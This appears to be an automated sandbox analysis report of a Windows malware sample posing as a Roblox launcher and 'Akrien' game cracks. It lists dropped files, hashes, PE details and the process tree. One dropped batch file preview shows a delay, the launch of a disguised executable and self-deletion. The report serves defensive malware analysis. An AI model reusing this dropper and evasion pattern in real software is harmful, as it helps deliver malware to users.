            Preview:2024-05-31 00:57:09.492 UTC..2024-05-31T00:57:09.006Z,0.006059,1c20,6 [FLog::Output] RobloxGitHash: cd8f60aa5fd1b833d79957e664b9bd42f71216a2..2024-05-31T00:57:09.023Z,0.023896,1c20,6 [FLog::Output] Bootstrapper::Bootstrapper..2024-05-31T00:57:09.023Z,0.023969,1c20,6 [FLog::Output] Bootstrapper::Bootstrapper..2024-05-31T00:57:09.023Z,0.023998,1c20,6 [FLog::Output] Main threadID 7200..2024-05-31T00:57:09.024Z,0.024030,1c20,6 [FLog::Output] Start time: 05-31-2024 00:57:09..2024-05-31T00:57:09.024Z,0.024062,1c20,6 [FLog::Output] installHost: setup.roblox.com..2024-05-31T00:57:09.024Z,0.024087,1c20,6 [FLog::Output] baseHost: www.roblox.com..2024-05-31T00:57:09.024Z,0.024950,1c20,6 [FLog::Output] flavor: VANILLA..2024-05-31T00:57:09.025Z,0.025080,1c20,6 [FLog::Output] The embedded channel is NONE..2024-05-31T00:57:09.025Z,0.025098,1c20,6 [FLog::Output] BootstrapperClient::BootstrapperClient..2024-05-31T00:57:09.025Z,0.025345,1c20,6 [FLog::Output] Bootstrapper::parseCmdLine params count = 13.
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):6010776
            Entropy (8bit):6.32462804770023
            Encrypted:false
            SSDEEP:98304:oSv4ntWoLPv8XcFqnlb3no0Fd7JxngykCN91s/CPUYY+Myu6K:FifLPFqDbjgyjs/C1YHytK
            MD5:442B78765B051E21BCF04E926B87079E
            SHA1:1A22CF8C593231A6963BF2A624BF105420D4DAE9
            SHA-256:4387634FEEB838CBF3156A553FF0914B3CBBC3369A1179A3C6FA57C58B755017
            SHA-512:DA2FB23108D05193776703ADDFAD8887FA8455E5A1DE441FA2A53D1DA6142559F19D1A64910D88643B73A23E12FA09B6CB04F3DF2AA007EDFE0A4ADB8175FEAA
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 0%
            Preview:MZ......................@...................................X...........!..L.!This program cannot be run in DOS mode....$........".vKC.%KC.%KC.%.1.$VC.%.1.$.C.%z.$%IC.%-,$%LC.%.6.$^C.%.6.$PC.%.6.$.C.%.1.$iC.%KC.%PC.%...$dA.%.6.$CC.%.6.$IC.%.6.$.C.%.1.$JC.%.1.$fC.%KC.%wA.%.6.$4C.%.6.$.C.%.6&%JC.%KCN%JC.%.6.$JC.%RichKC.%........................PE..L.....4..........."......j:..........4.......:...@..................................~\...@..................................J.........@6............[..)...........5H.p...................@6H......5H.@.............:..............................text....i:......j:................. ..`.rdata..x8....:..:...n:.............@..@.data.....~...J.......J.............@...CPADinfo(.............V.............@....rsrc...@6.......8....V.............@..@.reloc................X.............@..B........................................................................................................................................................................
            Process:C:\Users\user\Desktop\RFAwChXSve.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):6004632
            Entropy (8bit):6.323276318184256
            Encrypted:false
            SSDEEP:98304:/gvtZLOEVA+Wg9S5S6biBgjKzK4LrJgrWteDRCZGFy8JsuWb:A7KEKnm9K8grTCMywsZ
            MD5:938199CA646378B696716037AFC964BA
            SHA1:2D865BFECCF3BADEF2F64E5D6453E6AB71D5F5A7
            SHA-256:2ACC3E0879E4A71A6B08E2D6AF7B238198D2EDA73518B9394D82D00B010C9D7E
            SHA-512:1A37727C5DFAFFA3023845592B400ACC226FACE537176064698B8415D79284B6276FE68BF0E5870DC8898A846F923BD95EAAC1D185613759AD6CA1068456B322
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 0%
            Preview:MZ......................@...................................X...........!..L.!This program cannot be run in DOS mode....$........".vKC.%KC.%KC.%.1.$VC.%.1.$.C.%z.$%IC.%-,$%LC.%.6.$^C.%.6.$PC.%.6.$.C.%.1.$iC.%KC.%PC.%...$dA.%.6.$CC.%.6.$IC.%.6.$.C.%.1.$JC.%.1.$fC.%KC.%wA.%.6.$4C.%.6.$.C.%.6&%JC.%KCN%JC.%.6.$JC.%RichKC.%........................PE..L..."............."......Z:..........4......p:...@.................................D.\...@..................................xJ.........@6...........v[..)..........@!H.p...................."H......!H.@............p:..............................text...vY:......Z:................. ..`.rdata...4...p:..6...^:.............@..@.data... .~...J.......J.............@...CPADinfo(.............V.............@....rsrc...@6.......8....V.............@..@.reloc................X.............@..B........................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            File Type:data
            Category:dropped
            Size (bytes):40
            Entropy (8bit):3.154162526001658
            Encrypted:false
            SSDEEP:3:FkWXlD2lixvYf:9Dwf
            MD5:3E161B359C69D4C77CC2CD408F3125E7
            SHA1:1ABE16055576D5F9E4A6F7551DBD1C1A2966BEA4
            SHA-256:C0737B09478CA97F96E875A861819251B5AD2AB8116968FBECDF498EE2B97971
            SHA-512:E3CBAA00F021E95C344714315D1BD17564391A16A4255A1BD3C95DC33A62AB2FAC7EC9BF46A40C0C3BFE62F7AEF8DEF8C55EB4AA4EA1965357615A32EEF1D2F9
            Malicious:false
            Preview:sdPC.....................gS..bC@.v..b`0z
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):25
            Entropy (8bit):4.403856189774723
            Encrypted:false
            SSDEEP:3:dwN//Lqivn:A//r
            MD5:CC7D36848C7BBEFCDDBE811DCB31F58E
            SHA1:68D6D72F7E950B566096C6EDE09F9BB90A6FBF85
            SHA-256:E7D27BD42D2ABE4F6D6F44ECDAE96667C5FA3BA1FAE6DDCE3281062F8D6F03D1
            SHA-512:1E253C3AAE00DD07D9707B2D0DBEBECA5055319ABFA90FA2A342CC50E797C79125AD7F877D76903A0AB8C71991998A180AAFA4A74B5CF6E516E0FC6819F189A8
            Malicious:false
            Preview:xTfaIUHZa3Hdvtg4FAOPMn6EO
            Process:C:\Browserfont\refdhcp.exe
            File Type:DOS batch file, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):195
            Entropy (8bit):5.060945349165783
            Encrypted:false
            SSDEEP:6:hITg3Nou11r+DE1aHvQ+yKOZG1wkn23ffGRHn:OTg9YDEyof2RHn
            MD5:EB6705CD5685EC9F698E186A6C0F1832
            SHA1:D7BFD214F8027F8F5B18EB59688AEA864BFBFF0C
            SHA-256:C1C19625FAF828780DC11988F366FA1FBD95A2E7B322378A6AAA36CB44D49BCF
            SHA-512:54B5745A354FFA67414558ADE9E07B84785E63594A822E909CD2F64AA646A3A8877D141EA8446691D50BC1BA69DC7E069DD2332043C196218769B95CB3980922
            Malicious:false
            Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Users\Public\Videos\cmd.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\xmPWAq47dS.bat"
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (758), with no line terminators
            Category:dropped
            Size (bytes):758
            Entropy (8bit):5.891138077470593
            Encrypted:false
            SSDEEP:12:VI4GIKhUfP1oEpl0lmV8zgocNtfO2oIiApIX3Kcyya9JHY+/a6izl7nRUaR1ZoJZ:1GnQGEksflpU3KcyyaJZi6IRUaR10hi8
            MD5:EBFDA04FD507220A8ADF0959AE481619
            SHA1:D8D6CDB2C4D9E81E4122CE2BF931BF14F2BA7C1E
            SHA-256:108A7252CCBE0B5EEFAB01A2C953BA002FB7414D67871D06091906754738B8D0
            SHA-512:1F0250BE86CDAFE69F9C2A549BF44A1962B2755EDA0671BD704BD3595F0E3894F61FABC9CF6650BAA31F1E63591DF042DDC5D4943923148901FD2E80355536C5
            Malicious:false
            Preview:2F7m0ZtuyXhWOK1LXhTG7iZW4pIYZlxoSwl7icDy7vRwHp11XlZMnrxTpksLQVUNk3Dbi3m5deILQmPPyRAyLkAk8SR7t2hmaEMOlZSd8esIimDDVcW9UgC92dcQmpMl6fuMZAnZ8gzr21BWOOlRfiS4BNVI6B1SSHLC10nVy7AxqVGAbGBXD4FYN0KLofc6pgYvp9eYkQchheNqHVrz9ePXBxyBpbqTfDIJ6VUclnwxch1tmeETym6LRBt2KdsJkJCdVDtvAPOWrc4e6FZLWWe2H724mcSI4nMTeXYiuTTjYkdzGP6EEhwNoKWXLzJi6GcEPl9ir0aDD5egdCxWfNDW08oUAAW5JumSIZkfPXXNHtKtqz4IBwCtCFNQ7ohqde3SSLYEcSHIz0PGy5oLFN4Ws2PCLThlzrumz2aeazqsp44M0GcCAWkPkgka6W2JufSIGmR5eJuQhLrx8DME1fkcGeBSSAiE7h7JlwGNzgh0mUsYzwc2KxRP40Cll8nelpSANhML78PV8u0vvmcfiq4JPsOvuem02CO6CrLRkQ4Li6QK9Qz8gI65vIvfTbbdWZc5f4tEbL5SvslScEvdooUtGTK35p8JybzIdUoFhvgUMoKCgdDOp8yrEszMtzIvMwdT3dyHZq53H9gcIHWcmtdznHDufbVsmuIaK1JDo5z8D5kFMXDmcpJcSoqwZDl7VNQX1GRR8Txq4fvrh8iIXtP7lpHfKWolU1n0pMOFFwnJ1cix28Paed
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (889), with no line terminators
            Category:dropped
            Size (bytes):889
            Entropy (8bit):5.912617079137104
            Encrypted:false
            SSDEEP:24:Z+qZbNAFcX2wliB+UPjwxkRTwVyNaems5KLwFEtDsb+F:Z+qZpGwlidPjwxkRkVa75KVZEu
            MD5:5966742A42BE3B93B0C714C7841F6D81
            SHA1:B4931863F0B08A88AF8336514EA1349AE8070492
            SHA-256:D6C584AB88A8174E66B2C8561851225EAB953BA660519AAEA96C854478117D14
            SHA-512:3CD26A8441DAF2FD2DE4DBC62000920582FC9974F09079B63FBDC720BA6F17B470F15A588E5A5EB815858B592C0032AAAD611A9AD1D2481597A91A4817F87816
            Malicious:false
            Preview:3wSiwDRsZd2eTYKmxlnsb3ZivzyCH4J4dVQoqZ2S3mefg9KzTrE6cQb9Wtx6POkeT8B8Hf5XsUzzZ3Cvp9tZ0McN3RR6l5DoBALh8LrxvqNHamjdrCRPfKnHgyF0N9vwRLxZsewdS5nJ9UwQryPjoxJ0WEBKG0kw5a0PyKuMPy7jheHLByIYtMIdC7DncmWbV1OiehchDDTz0jT260JSsLDsRWN0HHtncfOqPjrdWlUq2SncoKrmdEtKxfQIUla6TqXUVnmXJp6G0W09suM6ZHKXwD2uSiJuKYWL5THBiTdxHmUbpRZjYegMg9hRu2EkgL5cAoDYmLXFoWQKtbEBJjWq1Ko5v0QqP2R6q2aANA6NGaiKtXhTxDb6zPkz9Inw4q0vFTd1ADxInJjaleLYT63MbUHbRlBFXKSakwEZ4pTtPTTqpKOe6Oc8xoUuMCkZCsuc0J0yZveonJ6HBbvHXgIJrUm6cUN2F4rhj0zfUZFKuyUorMtvQdCfjlvgg3WFiljsbZiKmQx8b7Y298OPlcml2L77FS8aC9mIPlMSniIAqDEmM2hipGeF970QbkFTRW5bUPmXw5mCTl5yGUuMuau5fgJSv51CdytTInR7PKvuebvXBCJGz2j0l95xGUm0Ejje2mpdDx7kpAbEvvRtwuNkP2rIsd15h4p52QfZWpDC58Lli0CVD3EUW8PA4gvj5BCuVfMeQ1WGqKpQrGk1ag2o0Vj3Beez4dG35aQCoiFLg7nLS8Sy64IZJY496ScvXhMNDwVQ0iM1bqH2rXlDMq39UqthgQGVGUy9vaHfnB8YrQ8dQBSirZiroM2WDxujb0vH2IHRPFZKreSDsPQf8ioqvHViivczRY60f1lI3ASm9Y9J4yoxhPl3M
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (340), with no line terminators
            Category:dropped
            Size (bytes):340
            Entropy (8bit):5.825457644940895
            Encrypted:false
            SSDEEP:6:eijjT9EOVekGIsWfMxJren0CNDmxxWRSHjRUeDSCwU8LySvEiuAfhgk/Sh2n:eijvxRWrJrpmUWRCVXOCMy0Emh8A
            MD5:37774C4161F44DDEB3719EE4D6B06003
            SHA1:9CB8D4B09FF7BAF58011B7C641EDA321FD24A7F3
            SHA-256:786BD740D2033F560ABEBDC150C44E54F334AE249D73BFAC9FA05DE472F25577
            SHA-512:866804135018C3AA1A306F9F8A200058DCA74B14B7147C9F5320308D980B07E464D9908C2FF1A58CBFA894C426F73A838482FCDF09D51453F359AB7AF46D5063
            Malicious:false
            Preview:CxqVosujafSlPmF6XPx36FaLAoQhkO69Lo0TicLqBHHGeWArGmgYcSY6XeUAcN9MiTakvvY4DG2y7Uronia7shg2Q35EILOxH5hL5a5VOlUWZj9DxqW4wBeAwhT2zTw22EqCwfsNmFtGNKcr42RbzUBGagYYGDf4zcdU26QR7JRqSYxmEm77CUChDkmPHUGjkzQvqIz8l9epCUyBtwTdFi1fZ5RRUAKmCsGcHC56x9VDzWfswkgUBndC8vVu0inkz1nUOV3q1WqFMypCaietezlZODeWqKFPWuO8tKebqzdo6YzKGSUSD4G9QOGK1hAqRbtcjrTQDDCoW7d0NTPY
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.993926033393968
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.94%
            • Win16/32 Executable Delphi generic (2074/23) 0.02%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • VXD Driver (31/22) 0.00%
            File name:RFAwChXSve.exe
            File size:13'752'832 bytes
            MD5:47ca55cdb30db720d739bfb73504b928
            SHA1:d0292acd8f617ce49e1830bd47e108c4c3f833e2
            SHA256:4cc156f578777710f3ce0c217664b9830ddfcab407f0c6de0cae10d5501d1ca1
            SHA512:6b265038b6f7b92238dcd33a9fac5cfca359df72107d037e038417d86a3a3bc79a46552ae3bfa8ab2aba257a72bb1b7f1584bc9ca3402483677ee9314d02af74
            SSDEEP:393216:cjMG3LZAmatuaWyJbpuSvTW00xyysfbtNcEH:cjr6matuapuSrW00xl4wEH
            TLSH:DDD63345EBAAB523E16489F46B3C633BD86DC9C3C9C79631B08851D841F0B098FE5EE5
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D.N..................................... ....@........................................................................
            Icon Hash:90cececece8e8eb0
            Entrypoint:0x401ad8
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            DLL Characteristics:
            Time Stamp:0x4EB8440D [Mon Nov 7 20:48:13 2011 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:94400fe3e62cd2376124312fe435b8e4
            Instruction
            call 00007F94F0875608h
            mov dword ptr [0040300Bh], eax
            push 00000000h
            call 00007F94F0875614h
            mov dword ptr [00403013h], eax
            call 00007F94F0875616h
            mov dword ptr [00410670h], eax
            push 0000000Ah
            push dword ptr [0040300Bh]
            push 00000000h
            push dword ptr [00403013h]
            call 00007F94F0874A58h
            push 00000000h
            call 00007F94F08755BFh
            jmp dword ptr [004020B4h]
            jmp dword ptr [004020B0h]
            jmp dword ptr [004020ACh]
            jmp dword ptr [004020A8h]
            jmp dword ptr [004020A4h]
            jmp dword ptr [004020A0h]
            jmp dword ptr [0040209Ch]
            jmp dword ptr [00402098h]
            jmp dword ptr [00402094h]
            jmp dword ptr [00402090h]
            jmp dword ptr [0040208Ch]
            jmp dword ptr [00402088h]
            jmp dword ptr [00402084h]
            jmp dword ptr [00402034h]
            jmp dword ptr [00402038h]
            jmp dword ptr [0040203Ch]
            jmp dword ptr [00402040h]
            jmp dword ptr [00402044h]
            jmp dword ptr [00402048h]
            jmp dword ptr [0040204Ch]
            jmp dword ptr [00402050h]
            jmp dword ptr [00402054h]
            jmp dword ptr [00402000h]
            jmp dword ptr [00000000h]
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x20bc0x50.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000xd1bb0c.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x20000xbc.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000xc1c0xe004b3f16d7c1b1a72b03a6b6a1781a9421False0.4771205357142857data5.123931017549605IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x20000x4c00x600128067a33e449c96b8dc66824ad4bcd5False0.4088541666666667data4.217635826521946IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x30000xd6f00x6007701054449ed29f5803ce4903a7bfc7bFalse0.16927083333333334data1.725550805200182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x110000xd1bb0c0xd1bc00458095619badf2fa81abecdb3513ae21unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            NameRVASizeTypeLanguageCountryZLIB Complexity
            IMAGE0x1110c0x42PC bitmap, Windows 3.x format, 1 x 1 x 1, image size 4, cbSize 66, bits offset 62EnglishUnited States0.5151515151515151
            RT_RCDATA0x111500x367ef9data0.9939203262329102
            RT_RCDATA0x37904c0x9b3a08data0.996891975402832
            RT_RCDATA0xd2ca540xb8data0.7010869565217391
            DLLImport
            user32.dllUpdateWindow, TranslateMessage, ShowWindow, SendMessageA, RegisterClassExA, PostQuitMessage, MessageBoxA, LoadIconA, LoadCursorA, GetMessageA, DispatchMessageA, DefWindowProcA, CreateWindowExA
            kernel32.dllGetModuleHandleA, HeapAlloc, lstrlenA, lstrcpynA, lstrcpyA, lstrcatA, WriteFile, SizeofResource, SetFileAttributesA, RtlMoveMemory, LockResource, LoadResource, LoadLibraryA, CloseHandle, CreateFileA, ExitProcess, FindResourceA, FreeResource, GetCommandLineA, GetEnvironmentVariableA, GetFileSize, GetModuleFileNameA, GlobalFree, GetProcAddress, GetProcessHeap, GetSystemDirectoryA, GetTempPathA, GetWindowsDirectoryA, GlobalAlloc, HeapFree
            shlwapi.dllPathFindFileNameA
            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States
            Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:20:57:06
            Start date:30/05/2024
            Path:C:\Users\user\Desktop\RFAwChXSve.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\RFAwChXSve.exe"
            Imagebase:0x400000
            File size:13'752'832 bytes
            MD5 hash:47CA55CDB30DB720D739BFB73504B928
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:1
            Start time:20:57:07
            Start date:30/05/2024
            Path:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe"
            Imagebase:0x6a0000
            File size:6'004'632 bytes
            MD5 hash:938199CA646378B696716037AFC964BA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 0%, ReversingLabs
            Reputation:low
            Has exited:true

            Target ID:2
            Start time:20:57:09
            Start date:30/05/2024
            Path:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe"
            Imagebase:0x400000
            File size:10'172'928 bytes
            MD5 hash:C4546882C186DC99C68501D0DB7FBB21
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 100%, ReversingLabs
            Reputation:low
            Has exited:true

            Target ID:3
            Start time:20:57:09
            Start date:30/05/2024
            Path:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\user\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\user\AppData\Local\Temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=cd8f60aa5fd1b833d79957e664b9bd42f71216a2 --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x8b4,0x8b8,0x8bc,0x884,0x8c0,0x12c9d84,0x12c9d94,0x12c9da4
            Imagebase:0x6a0000
            File size:6'004'632 bytes
            MD5 hash:938199CA646378B696716037AFC964BA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:4
            Start time:20:57:10
            Start date:30/05/2024
            Path:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe"
            Imagebase:0x140000000
            File size:9'388'032 bytes
            MD5 hash:830511D481D3B0D9E73F8475159EBEE3
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 53%, ReversingLabs
            Reputation:low
            Has exited:false

            Target ID:5
            Start time:20:57:10
            Start date:30/05/2024
            Path:C:\Users\user\AppData\Local\Temp\AkrienCrack.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Local\Temp\AkrienCrack.exe"
            Imagebase:0xb40000
            File size:1'164'347 bytes
            MD5 hash:F01B45525A3718CEEDFCC788392DFE50
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 75%, ReversingLabs
            Reputation:low
            Has exited:true

            Target ID:6
            Start time:20:57:11
            Start date:30/05/2024
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe"
            Imagebase:0x100000
            File size:147'456 bytes
            MD5 hash:FF00E0480075B095948000BDC66E81F0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            Target ID:7
            Start time:20:57:18
            Start date:30/05/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Browserfont\hryZMJ.bat" "
            Imagebase:0x240000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:8
            Start time:20:57:18
            Start date:30/05/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:20:57:18
            Start date:30/05/2024
            Path:C:\Browserfont\refdhcp.exe
            Wow64 process (32bit):false
            Commandline:"C:\Browserfont\refdhcp.exe"
            Imagebase:0x280000
            File size:847'360 bytes
